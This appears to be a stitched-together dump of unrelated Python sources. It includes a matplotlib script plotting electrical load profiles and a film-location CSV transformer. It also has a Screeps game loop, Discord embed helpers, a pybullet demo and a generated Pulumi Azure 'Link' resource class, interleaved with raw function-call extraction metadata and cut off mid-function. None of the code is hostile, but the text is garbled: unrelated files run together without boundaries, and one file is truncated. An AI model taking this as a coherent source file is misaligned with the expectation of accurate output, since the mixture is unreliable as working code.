bbox_to_anchor=(0., 1.03, 1., .103), loc=8, ncol=4,
handletextpad=0.2, mode='expand', handlelength=3,
borderaxespad=0.25, fancybox=False, fontsize='x-small')
# import pdb
# pdb.set_trace()
return fig
def plot_aggregated_SLP(sc, bd, unctrl, ctrl, ctrl_sched, res=1):
assert hasattr(sc, 'slp_file')
t_day_start = sc.t_block_start - timedelta(hours=sc.t_block_start.hour,
minutes=sc.t_block_start.minute)
skip = (t_day_start - sc.t_start).total_seconds() / 60 / res
i_block_start = (sc.t_block_start - t_day_start).total_seconds() / 60 / res
i_block_end = (sc.t_block_end - t_day_start).total_seconds() / 60 / res
t = drange(sc.t_block_start, sc.t_block_end, timedelta(minutes=res))
P_el_unctrl = unctrl[:,0,skip + i_block_start:skip + i_block_end].sum(0)
P_el_ctrl = ctrl[:,0,skip + i_block_start:skip + i_block_end].sum(0)
# ctrl correction
P_el_ctrl = np.roll(P_el_ctrl, -1, axis=0)
P_el_sched = ctrl_sched[:,skip + i_block_start:skip + i_block_end].sum(0)
T_storage_ctrl = ctrl[:,2,skip + i_block_start:skip + i_block_end]
slp = _read_slp(sc, bd)[skip + i_block_start:skip + i_block_end]
# diff_ctrl = (P_el_ctrl - P_el_unctrl) / 1000.0
diff_ctrl = (P_el_sched - P_el_unctrl) / 1000.0
diff_ctrl_fill = np.repeat((slp + diff_ctrl)[:-1], 2)
slp_fill = np.repeat(slp[:-1], 2)
ft = np.array([t[0]] + list(np.repeat(t[1:-1], 2)) + [t[-1]])
# P_el_ctrl_fill = np.repeat(P_el_ctrl[:-1], 2)
P_el_ctrl_fill = np.repeat(P_el_sched[:-1], 2)
fig, ax = plt.subplots(2, sharex=True)
fig.subplots_adjust(left=0.11, right=0.998, hspace=0.2, top=0.95)
for a in ax:
plt.setp(list(a.spines.values()), color='k')
plt.setp([a.get_xticklines(), a.get_yticklines()], color='k')
ax[0].set_ylabel('P$_{\mathrm{el}}$ [kW]')
ymax = max(P_el_unctrl.max(), P_el_ctrl_fill.max(), P_el_sched.max(), 0) / 1000.0
ymin = min(P_el_unctrl.min(), P_el_ctrl_fill.min(), P_el_sched.min(), 0) / 1000.0
ax[0].set_ylim(ymin - abs(ymin * 0.1), ymax + abs(ymax * 0.1))
xspace = (t[-1] - t[-2])
ax[0].set_xlim(t[0], t[-1] + xspace)
l_unctrl, = ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt=':', color='k', drawstyle='steps-post', lw=0.75, label='original')
l_unctrl.set_dashes([1.0, 1.0])
# add lw=0.0 due to bug in mpl (will show as hairline in pdf though...)
l_ctrl = ax[0].fill_between(ft, P_el_ctrl_fill / 1000.0, facecolors=GRAY+(0.75,), edgecolors=EC, lw=0.0)
# Create proxy artist as l_ctrl legend handle
l_ctrl_proxy = Rectangle((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)
# l_sched, = ax[0].plot_date(t, P_el_sched / 1000.0, fmt='-', color=PRIM, drawstyle='steps-post', lw=0.75, label='gesteuert')
# colors = [
# '#348ABD', # blue
# '#7A68A6', # purple
# '#A60628', # red
# '#467821', # green
# '#CF4457', # pink
# '#188487', # turqoise
# '#E24A33', # orange
# '#1F4A7D', # primary
# '#BF9D23', # secondary
# '#BF5B23', # complementary
# '#94A4B6', # primaryA
# '#6581A4', # primaryB
# '#29415E', # primaryC
# '#0A2A51', # primaryD
# ][:len(unctrl)]
# for (c, P_el_unctrl, P_el_ctrl, P_el_sched) in zip(colors, unctrl[:,0,:], ctrl[:,0,:], ctrl_sched):
# ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt='-', color=c, lw=1, label='unctrl')
# ax[0].plot_date(t, P_el_ctrl / 1000.0, fmt=':', color=c, lw=1, label='ctrl')
# ax[0].plot_date(t, P_el_sched / 1000.0, fmt='--x', color=c, lw=1, label='sched')
ax[1].set_ylabel('P$_{el}$ [kW]')
ax[1].set_xlabel('Time of day')
ymin = min(slp.min(), (slp + diff_ctrl).min())
ax[1].set_ylim(ymin + (ymin * 0.1), 0)
l_unctrl_slp, = ax[1].plot_date(t, slp, fmt=':', color='k', drawstyle='steps-post', lw=0.75, label='original')
l_unctrl_slp.set_dashes([1.0, 1.0])
ax[1].fill_between(ft, diff_ctrl_fill, slp_fill, where=diff_ctrl_fill>=slp_fill, facecolors=GRAY+(0.3,), edgecolors=EC, lw=0.0)
l_diff_slp = ax[1].fill_between(ft, diff_ctrl_fill, slp_fill, where=diff_ctrl_fill<slp_fill, facecolors=GRAY+(0.3,), edgecolors=EC, lw=0.0)
# Create proxy artist as l_diff_slp legend handle
l_diff_slp_proxy = Rectangle((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.3)
l_ctrl_slp, = ax[1].plot_date(t, slp + diff_ctrl, fmt='-', color='k', drawstyle='steps-post', lw=0.75, label='scheduled')
# ax[0].legend([l_sched, l_unctrl, l_T_med],
# ['Verbundfahrplan', 'ungesteuert', 'Speichertemperaturen (Median)'],
# bbox_to_anchor=(0., 1.05, 1., .105), loc=8, ncol=4,
# handletextpad=0.2, mode='expand', handlelength=3,
# borderaxespad=0.25, fancybox=False, fontsize='x-small')
ax[0].text(0.5, 1.05, 'Profile of the units under control', ha='center', va='center',
fontsize='small', transform=ax[0].transAxes)
ax[1].text(0.5, 1.05, 'Profile of the medium-voltage node', ha='center', va='center',
fontsize='small', transform=ax[1].transAxes)
ax[0].legend([l_unctrl, l_ctrl_proxy], ['original', 'scheduled'], loc='upper right', fancybox=False, fontsize='x-small')
ax[1].legend([l_unctrl_slp, l_ctrl_slp, l_diff_slp_proxy], ['original', 'scheduled', 'difference'], loc='upper right', fancybox=False, fontsize='x-small')
fig.autofmt_xdate()
ax[0].xaxis.get_major_formatter().scaled[1/24.] = '%H:%M'
return fig
def norm(minimum, maximum, value):
# return value
if maximum == minimum:
return maximum
return (value - minimum) / (maximum - minimum)
def _read_slp(sc, bd):
# Read csv data
slp = []
found = False
with open(sc.slp_file, 'r', encoding='latin-1') as f:
reader = csv.reader(f, delimiter=';')
for row in reader:
if not row:
continue
if not found and row[0] == 'Datum':
found = True
elif found:
date = datetime.strptime('_'.join(row[:2]), '%d.%m.%Y_%H:%M:%S')
if date < sc.t_start:
continue
elif date >= sc.t_end:
break
# This is a demand, so negate the values
slp.append(-1.0 * float(row[2].replace(',', '.')))
slp = np.array(slp)
# Scale values
# if hasattr(sc, 'run_unctrl_datafile'):
# slp_norm = norm(slp.min(), slp.max(), slp)
# unctrl = load(p(bd, sc.run_unctrl_datafile)).sum(0) / 1000
# slp = slp_norm * (unctrl.max() - unctrl.min()) + unctrl.min()
MS_day_mean = 13600 # kWh, derived from SmartNord Scenario document
MS_15_mean = MS_day_mean / 96
slp = slp / np.abs(slp.mean()) * MS_15_mean
return slp
# return np.array(np.roll(slp, 224, axis=0))
def p(basedir, fn):
return os.path.join(basedir, fn)
def resample(d, resolution):
# resample the innermost axis to 'resolution'
shape = tuple(d.shape[:-1]) + (int(d.shape[-1]/resolution), resolution)
return d.reshape(shape).sum(-1)/resolution
def run(sc_file):
print()
bd = os.path.dirname(sc_file)
sc = scenario_factory.Scenario()
sc.load_JSON(sc_file)
print(sc.title)
# # plot_samples(sc, bd)
# plot_samples_carpet(sc, bd)
# plt.show()
# sys.exit(0)
unctrl = load(p(bd, sc.run_unctrl_datafile))
block = load(p(bd, sc.run_ctrl_datafile))
post = load(p(bd, sc.run_post_datafile))
sched = load(p(bd, sc.sched_file))
ctrl = np.zeros(unctrl.shape)
idx = 0
for l in (block, post):
ctrl[:,:,idx:idx + l.shape[-1]] = l
idx += l.shape[-1]
if sched.shape[-1] == unctrl.shape[-1] / 15:
print('Extending schedules shape by factor 15')
sched = sched.repeat(15, axis=1)
t_start, b_start, b_end = sc.t_start, sc.t_block_start, sc.t_block_end
div = 1
if (b_end - t_start).total_seconds() / 60 == sched.shape[-1] * 15:
div = 15
elif (b_end - t_start).total_seconds() / 60 == sched.shape[-1] * 60:
div = 60
b_s = (b_start - sc.t_start).total_seconds() / 60 / div
b_e = (b_end - sc.t_start).total_seconds() / 60 / div
ctrl_sched = np.zeros((unctrl.shape[0], unctrl.shape[-1]))
ctrl_sched = np.ma.array(ctrl_sched)
ctrl_sched[:,:b_s] = np.ma.masked
ctrl_sched[:,b_s:b_e] = sched[:,b_s:b_e]
ctrl_sched[:,b_e:] = np.ma.masked
# plot_each_device(sc, unctrl, ctrl, sched)
minutes = (sc.t_end - sc.t_start).total_seconds() / 60
assert unctrl.shape[-1] == ctrl.shape[-1] == ctrl_sched.shape[-1]
shape = unctrl.shape[-1]
if hasattr(sc, 'slp_file'):
if minutes == shape:
print('data is 1-minute resolution, will be resampled by 15')
res = 15
elif minutes == shape * 15:
print('data is 15-minute resolution, all fine')
res = 1
else:
raise RuntimeError('unsupported data resolution: %.2f' % (minutes / shape))
unctrl = resample(unctrl, res)
ctrl = resample(ctrl, res)
ctrl_sched = resample(ctrl_sched, res)
fig = plot_aggregated_SLP(sc, bd, unctrl, ctrl, ctrl_sched, res=15)
else:
if minutes == shape:
print('data is 1-minute resolution, will be resampled by 60')
res = 60
elif minutes == shape * 15:
print('data is 15-minute resolution, will be resampled by 4')
res = 4
elif minutes == shape * 60:
print('data is 60-minute resolution, all fine')
res = 1
else:
raise RuntimeError('unsupported data resolution: %.2f' % (minutes / shape))
unctrl = resample(unctrl, res)
ctrl = resample(ctrl, res)
ctrl_sched = resample(ctrl_sched, res)
fig = plot_aggregated(sc, bd, unctrl, ctrl, ctrl_sched, res=60)
fig.savefig(p(bd, sc.title) + '.pdf')
fig.savefig(p(bd, sc.title) + '.png', dpi=300)
plt.show()
if __name__ == '__main__':
for n in sys.argv[1:]:
if os.path.isdir(n):
run(p(n, '0.json'))
else:
run(n)
| [
"matplotlib.patches.Rectangle",
"numpy.repeat",
"numpy.roll",
"numpy.ma.array",
"os.path.join",
"numpy.array",
"os.path.dirname",
"numpy.zeros",
"os.path.isdir",
"datetime.timedelta",
"numpy.load",
"csv.reader",
"matplotlib.pyplot.subplots",
"scenario_factory.Scenario",
"matplotlib.pyplo... | [((1295, 1318), 'numpy.ma.array', 'np.ma.array', (['P_el_sched'], {}), '(P_el_sched)\n', (1306, 1318), True, 'import numpy as np\n'), ((1331, 1349), 'numpy.array', 'np.array', (['sc.block'], {}), '(sc.block)\n', (1339, 1349), True, 'import numpy as np\n'), ((1723, 1751), 'numpy.repeat', 'np.repeat', (['P_el_ctrl[:-1]', '(2)'], {}), '(P_el_ctrl[:-1], 2)\n', (1732, 1751), True, 'import numpy as np\n'), ((1767, 1795), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {'sharex': '(True)'}), '(2, sharex=True)\n', (1779, 1795), True, 'import matplotlib.pyplot as plt\n'), ((3124, 3185), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(1)', '(1)'], {'fc': 'GRAY', 'ec': 'WHITE', 'lw': '(0.0)', 'alpha': '(0.5)'}), '((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)\n', (3133, 3185), False, 'from matplotlib.patches import Rectangle\n'), ((6634, 6664), 'numpy.roll', 'np.roll', (['P_el_ctrl', '(-1)'], {'axis': '(0)'}), '(P_el_ctrl, -1, axis=0)\n', (6641, 6664), True, 'import numpy as np\n'), ((7010, 7046), 'numpy.repeat', 'np.repeat', (['(slp + diff_ctrl)[:-1]', '(2)'], {}), '((slp + diff_ctrl)[:-1], 2)\n', (7019, 7046), True, 'import numpy as np\n'), ((7062, 7084), 'numpy.repeat', 'np.repeat', (['slp[:-1]', '(2)'], {}), '(slp[:-1], 2)\n', (7071, 7084), True, 'import numpy as np\n'), ((7225, 7254), 'numpy.repeat', 'np.repeat', (['P_el_sched[:-1]', '(2)'], {}), '(P_el_sched[:-1], 2)\n', (7234, 7254), True, 'import numpy as np\n'), ((7270, 7298), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {'sharex': '(True)'}), '(2, sharex=True)\n', (7282, 7298), True, 'import matplotlib.pyplot as plt\n'), ((8285, 8346), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(1)', '(1)'], {'fc': 'GRAY', 'ec': 'WHITE', 'lw': '(0.0)', 'alpha': '(0.5)'}), '((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)\n', (8294, 8346), False, 'from matplotlib.patches import Rectangle\n'), ((10185, 10246), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(1)', '(1)'], {'fc': 'GRAY', 'ec': 'WHITE', 'lw': '(0.0)', 'alpha': '(0.3)'}), '((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.3)\n', (10194, 10246), False, 'from matplotlib.patches import Rectangle\n'), ((12270, 12283), 'numpy.array', 'np.array', (['slp'], {}), '(slp)\n', (12278, 12283), True, 'import numpy as np\n'), ((12793, 12818), 'os.path.join', 'os.path.join', (['basedir', 'fn'], {}), '(basedir, fn)\n', (12805, 12818), False, 'import os\n'), ((13064, 13088), 'os.path.dirname', 'os.path.dirname', (['sc_file'], {}), '(sc_file)\n', (13079, 13088), False, 'import os\n'), ((13098, 13125), 'scenario_factory.Scenario', 'scenario_factory.Scenario', ([], {}), '()\n', (13123, 13125), False, 'import scenario_factory\n'), ((13463, 13485), 'numpy.zeros', 'np.zeros', (['unctrl.shape'], {}), '(unctrl.shape)\n', (13471, 13485), True, 'import numpy as np\n'), ((14144, 14189), 'numpy.zeros', 'np.zeros', (['(unctrl.shape[0], unctrl.shape[-1])'], {}), '((unctrl.shape[0], unctrl.shape[-1]))\n', (14152, 14189), True, 'import numpy as np\n'), ((14207, 14230), 'numpy.ma.array', 'np.ma.array', (['ctrl_sched'], {}), '(ctrl_sched)\n', (14218, 14230), True, 'import numpy as np\n'), ((15903, 15913), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (15911, 15913), True, 'import matplotlib.pyplot as plt\n'), ((555, 565), 'numpy.load', 'np.load', (['f'], {}), '(f)\n', (562, 565), True, 'import numpy as np\n'), ((753, 824), 'datetime.timedelta', 'timedelta', ([], {'hours': 'sc.t_block_start.hour', 'minutes': 'sc.t_block_start.minute'}), '(hours=sc.t_block_start.hour, minutes=sc.t_block_start.minute)\n', (762, 824), False, 'from datetime import datetime, timedelta\n'), ((904, 926), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'res'}), '(minutes=res)\n', (913, 926), False, 'from datetime import datetime, timedelta\n'), ((6038, 6109), 'datetime.timedelta', 'timedelta', ([], {'hours': 'sc.t_block_start.hour', 'minutes': 'sc.t_block_start.minute'}), '(hours=sc.t_block_start.hour, minutes=sc.t_block_start.minute)\n', (6047, 6109), False, 'from datetime import datetime, timedelta\n'), ((6421, 6443), 'datetime.timedelta', 'timedelta', ([], {'minutes': 'res'}), '(minutes=res)\n', (6430, 6443), False, 'from datetime import datetime, timedelta\n'), ((11717, 11745), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '""";"""'}), "(f, delimiter=';')\n", (11727, 11745), False, 'import csv\n'), ((15981, 15997), 'os.path.isdir', 'os.path.isdir', (['n'], {}), '(n)\n', (15994, 15997), False, 'import os\n'), ((1668, 1689), 'numpy.repeat', 'np.repeat', (['t[1:-1]', '(2)'], {}), '(t[1:-1], 2)\n', (1677, 1689), True, 'import numpy as np\n'), ((7118, 7139), 'numpy.repeat', 'np.repeat', (['t[1:-1]', '(2)'], {}), '(t[1:-1], 2)\n', (7127, 7139), True, 'import numpy as np\n')] |
"""Functions for transforming raw data about the films into csv"""
from typing import List, Tuple
import pandas as pd
def extract_info(line: str):
"""
Extract information from raw string with information
about the film: title, year and location. If data is
invalid, return None.
"""
try:
# Extract title which is either surrounded with "" or not
if line[0] == '"':
line = line[1:]
title = line[:line.find('"')]
else:
title = line[:line.find(' ')]
# Extract year which is located inside parentheses
year_start_idx = line.find('(')
year = int(line[year_start_idx + 1:year_start_idx + 5])
# Extract location from the
if '\t\t' not in line:
location = line.rsplit('}\t', maxsplit=1)[1]
else:
location = line.rsplit('\t\t', maxsplit=1)[1]
# Clear up the location
location = location.rsplit(
'(', maxsplit=1)[0].replace('\t', '').rsplit('\n')[0]
return title, year, location
except Exception:
# If an error occurs, raw data is invalid
return None
def read_data(filename: str) -> List[Tuple[str, int, str]]:
"""
Read data about films from the given file and transform it into a list.
"""
with open(filename, 'r', errors='ignore') as locations_raw:
lines = locations_raw.readlines()
locations = []
for line in lines:
data = extract_info(line)
if data is None:
continue
locations.append(data)
return locations
def save_data(data: pd.DataFrame, filename: str):
"""
Save the data into a given file.
"""
data.to_csv(filename, index=False)
def transform_data(data: List[Tuple[str, int, str]]) -> pd.DataFrame:
"""
Transform the given data into a DataFrame. Data is expected to
contain information about film titles, years and locations.
"""
df = pd.DataFrame(data, columns=['Title', 'Year', 'Location'])
# Add a column with country name
df['Country'] = df['Location'].str.rsplit(', ').apply(lambda x: x[-1])
# Remove rows where location is equal to country name
df = df[~(df['Country'] == df['Location'])]
# Drop rows with duplicated location
df.drop_duplicates(subset='Location', keep='first', inplace=True)
return df
def main(filename: str, output_filename: str = 'locations.csv'):
"""
Read raw data from the file, transform it into DataFrame and save.
The default output filename is 'locations.csv'.
"""
data = read_data(filename)
df = transform_data(data)
save_data(df, output_filename)
main('locations.list')
| [
"pandas.DataFrame"
] | [((1971, 2028), 'pandas.DataFrame', 'pd.DataFrame', (['data'], {'columns': "['Title', 'Year', 'Location']"}), "(data, columns=['Title', 'Year', 'Location'])\n", (1983, 2028), True, 'import pandas as pd\n')] |
from defs import *
def main() -> None:
"""
Main game logic loop shim.
"""
from providers import cpucheck
cpucheck.instantiate()
if cpucheck.is_over_limit():
return
import logic
logic.main()
module.exports.loop = main
| [
"providers.cpucheck.instantiate",
"logic.main",
"providers.cpucheck.is_over_limit"
] | [((128, 150), 'providers.cpucheck.instantiate', 'cpucheck.instantiate', ([], {}), '()\n', (148, 150), False, 'from providers import cpucheck\n'), ((159, 183), 'providers.cpucheck.is_over_limit', 'cpucheck.is_over_limit', ([], {}), '()\n', (181, 183), False, 'from providers import cpucheck\n'), ((222, 234), 'logic.main', 'logic.main', ([], {}), '()\n', (232, 234), False, 'import logic\n')] |
import discord
import random
def create_embed(text):
embed=discord.Embed(description=text,color=discord.Color.blurple())
return embed
def error_embed(text):
embed=discord.Embed(description=text,color=discord.Color.red())
return embed
| [
"discord.Color.blurple",
"discord.Color.red"
] | [((105, 128), 'discord.Color.blurple', 'discord.Color.blurple', ([], {}), '()\n', (126, 128), False, 'import discord\n'), ((224, 243), 'discord.Color.red', 'discord.Color.red', ([], {}), '()\n', (241, 243), False, 'import discord\n')] |
import pybullet as p
import time
p.connect(p.PhysX)
p.loadPlugin("eglRendererPlugin")
p.loadURDF("plane.urdf")
for i in range (50):
p.loadURDF("r2d2.urdf",[0,0,1+i*2])
p.setGravity(0,0,-10)
while (1):
p.stepSimulation()
time.sleep(1./240.) | [
"pybullet.connect",
"pybullet.setGravity",
"time.sleep",
"pybullet.stepSimulation",
"pybullet.loadURDF",
"pybullet.loadPlugin"
] | [((34, 52), 'pybullet.connect', 'p.connect', (['p.PhysX'], {}), '(p.PhysX)\n', (43, 52), True, 'import pybullet as p\n'), ((53, 86), 'pybullet.loadPlugin', 'p.loadPlugin', (['"""eglRendererPlugin"""'], {}), "('eglRendererPlugin')\n", (65, 86), True, 'import pybullet as p\n'), ((88, 112), 'pybullet.loadURDF', 'p.loadURDF', (['"""plane.urdf"""'], {}), "('plane.urdf')\n", (98, 112), True, 'import pybullet as p\n'), ((171, 194), 'pybullet.setGravity', 'p.setGravity', (['(0)', '(0)', '(-10)'], {}), '(0, 0, -10)\n', (183, 194), True, 'import pybullet as p\n'), ((135, 177), 'pybullet.loadURDF', 'p.loadURDF', (['"""r2d2.urdf"""', '[0, 0, 1 + i * 2]'], {}), "('r2d2.urdf', [0, 0, 1 + i * 2])\n", (145, 177), True, 'import pybullet as p\n'), ((206, 224), 'pybullet.stepSimulation', 'p.stepSimulation', ([], {}), '()\n', (222, 224), True, 'import pybullet as p\n'), ((226, 249), 'time.sleep', 'time.sleep', (['(1.0 / 240.0)'], {}), '(1.0 / 240.0)\n', (236, 249), False, 'import time\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['LinkArgs', 'Link']
@pulumi.input_type
class LinkArgs:
def __init__(__self__, *,
hub_name: pulumi.Input[str],
participant_property_references: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]],
resource_group_name: pulumi.Input[str],
source_interaction_type: pulumi.Input[str],
target_profile_type: pulumi.Input[str],
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
reference_only: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a Link resource.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
pulumi.set(__self__, "hub_name", hub_name)
pulumi.set(__self__, "participant_property_references", participant_property_references)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "source_interaction_type", source_interaction_type)
pulumi.set(__self__, "target_profile_type", target_profile_type)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if link_name is not None:
pulumi.set(__self__, "link_name", link_name)
if mappings is not None:
pulumi.set(__self__, "mappings", mappings)
if operation_type is not None:
pulumi.set(__self__, "operation_type", operation_type)
if reference_only is not None:
pulumi.set(__self__, "reference_only", reference_only)
@property
@pulumi.getter(name="hubName")
def hub_name(self) -> pulumi.Input[str]:
"""
The name of the hub.
"""
return pulumi.get(self, "hub_name")
@hub_name.setter
def hub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "hub_name", value)
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@participant_property_references.setter
def participant_property_references(self, value: pulumi.Input[Sequence[pulumi.Input['ParticipantPropertyReferenceArgs']]]):
pulumi.set(self, "participant_property_references", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Input[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@source_interaction_type.setter
def source_interaction_type(self, value: pulumi.Input[str]):
pulumi.set(self, "source_interaction_type", value)
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Input[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@target_profile_type.setter
def target_profile_type(self, value: pulumi.Input[str]):
pulumi.set(self, "target_profile_type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="linkName")
def link_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the link.
"""
return pulumi.get(self, "link_name")
@link_name.setter
def link_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "link_name", value)
@property
@pulumi.getter
def mappings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@mappings.setter
def mappings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]):
pulumi.set(self, "mappings", value)
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> Optional[pulumi.Input['InstanceOperationType']]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@operation_type.setter
def operation_type(self, value: Optional[pulumi.Input['InstanceOperationType']]):
pulumi.set(self, "operation_type", value)
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> Optional[pulumi.Input[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@reference_only.setter
def reference_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reference_only", value)
class Link(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LinkArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param LinkArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LinkArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
